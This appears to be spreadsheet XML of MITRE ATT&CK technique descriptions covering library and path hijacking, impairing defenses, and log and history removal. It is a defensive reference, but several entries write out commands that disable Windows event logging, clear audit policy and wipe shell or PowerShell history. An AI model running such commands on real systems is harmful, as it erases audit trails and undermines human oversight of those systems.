    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with &lt;code&gt;@rpath&lt;/code&gt;, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt; function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; on Linux or &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the &lt;code&gt;export&lt;/code&gt; command, &lt;code&gt;setenv&lt;/code&gt; function, or &lt;code&gt;putenv&lt;/code&gt; function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s &lt;code&gt;os.environ&lt;/code&gt;.
On Linux, adversaries may set &lt;code&gt;LD_PRELOAD&lt;/code&gt; to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. &lt;code&gt;LD_PRELOAD&lt;/code&gt; can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by &lt;code&gt;LD_PRELOAD&lt;/code&gt; are loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) </t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;KernelCallbackTable&lt;/code&gt; of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once &lt;code&gt;user32.dll&lt;/code&gt; is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the &lt;code&gt;KernelCallbackTable&lt;/code&gt; by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be obtained by locating the PEB (ex: via a call to the &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be duplicated, and a function in the table (e.g., &lt;code&gt;fnCOPYDATA&lt;/code&gt;) set to the address of a malicious payload (ex: via &lt;code&gt;WriteProcessMemory()&lt;/code&gt;). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;/code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the &lt;code&gt;FailureCommand&lt;/code&gt; key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The &lt;code&gt;Performance&lt;/code&gt; key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the &lt;code&gt;Performance&lt;/code&gt; key is not already present and if an adversary-controlled user has the &lt;code&gt;Create Subkey&lt;/code&gt; permission, adversaries may create the &lt;code&gt;Performance&lt;/code&gt; key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the &lt;code&gt;Parameters&lt;/code&gt; key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;.(Citation: malware_hides_service)</t>
  </si>
  <si>
    <t>Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. 
Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</t>
  </si>
  <si>
    <t>Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to &lt;code&gt;Security Settings\Local Policies\Audit Policy&lt;/code&gt; for basic audit policy settings or &lt;code&gt;Security Settings\Advanced Audit Policy Configuration&lt;/code&gt; for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) &lt;code&gt;auditpol.exe&lt;/code&gt; may also be used to set audit policies.(Citation: auditpol)
Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: &lt;code&gt;Stop-Service -Name EventLog&lt;/code&gt;.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use &lt;code&gt;auditpol&lt;/code&gt; and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the &lt;code&gt;/success&lt;/code&gt; or &lt;code&gt;/failure&lt;/code&gt; parameters. For example, &lt;code&gt;auditpol /set /category:”Account Logon” /success:disable /failure:disable&lt;/code&gt; turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: &lt;code&gt;auditpol /clear /y&lt;/code&gt; or &lt;code&gt;auditpol /remove /allusers&lt;/code&gt;.(Citation: T1562.002_redcanaryco)
By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.</t>
  </si>
  <si>
    <t>Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). 
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. </t>
  </si>
  <si>
    <t>Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)</t>
  </si>
  <si>
    <t>Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)</t>
  </si>
  <si>
    <t>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 
On Linux and macOS, command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (&lt;code&gt;unset HISTFILE&lt;/code&gt;) or set the command history size to zero (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) to prevent logging of commands. Additionally, &lt;code&gt;HISTCONTROL&lt;/code&gt; can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. 
On Windows systems, the &lt;code&gt;PSReadLine&lt;/code&gt; module tracks commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). Adversaries may change where these logs are saved using &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. This will cause &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. &lt;code&gt;no logging&lt;/code&gt;).</t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)
Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)</t>
  </si>
  <si>
    <t>Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)</t>
  </si>
  <si>
    <t>Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.  
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (&lt;code&gt;clear logging&lt;/code&gt; and/or &lt;code&gt;clear history&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
</t>
  </si>
  <si>
    <t>Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests. 
